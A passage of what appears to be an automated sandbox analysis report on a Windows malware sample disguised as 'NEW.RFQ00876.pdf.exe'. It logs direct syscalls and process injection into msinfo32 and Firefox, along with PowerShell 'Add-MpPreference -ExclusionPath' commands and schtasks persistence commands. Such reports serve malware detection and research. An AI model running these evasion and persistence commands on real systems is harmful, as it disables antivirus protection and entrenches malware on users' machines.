                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01848918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018DC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018E892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01876962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0189096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0189096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018DC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018F4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01850887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018DC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0187E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0188C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0191A8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018DC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01872835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01872835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018F483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0188A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01862840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01854859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01880854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018E6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018DE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01860BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01850BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01870BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018FEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01858BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0187EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018DCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018CEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0187EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01918B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018F8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018E6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0191AB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0184CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0185EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01924A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01888A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01858AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018A6AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018A6ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01850AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01884AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0188AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018DCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0187EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0188CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0188CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01874A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01856A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01860A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0188CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018CCA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01886DA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01878DBF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0188CDB1 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0188CDB1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01924DAD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01918DAE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0187EDD3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D4DD7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0185ADE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01870DE1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0184CDEA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01846DF6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0187CDF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0187CDF0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018F0DF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01908D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0186AD00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"Jump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtSetInformationThread: Direct from: 0x77762ECC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeMemory written: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeMemory written: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: NULL target: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: NULL target: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe protection: read write
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: NULL target: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\msinfo32.exe | Thread register set: target process: 4908
                Source: C:\Windows\SysWOW64\msinfo32.exe | Thread APC queued: target process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp"
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Process created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe | Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
                Source: C:\Windows\SysWOW64\msinfo32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: aegBDZrMeWOlT.exe, 00000018.00000000.1385756132.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 00000018.00000002.3731180020.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538853146.0000000001640000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: aegBDZrMeWOlT.exe, 00000018.00000000.1385756132.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 00000018.00000002.3731180020.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538853146.0000000001640000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: aegBDZrMeWOlT.exe, 00000018.00000000.1385756132.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 00000018.00000002.3731180020.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538853146.0000000001640000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
                Source: aegBDZrMeWOlT.exe, 00000018.00000000.1385756132.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 00000018.00000002.3731180020.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538853146.0000000001640000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Queries volume information: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe VolumeInformation
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
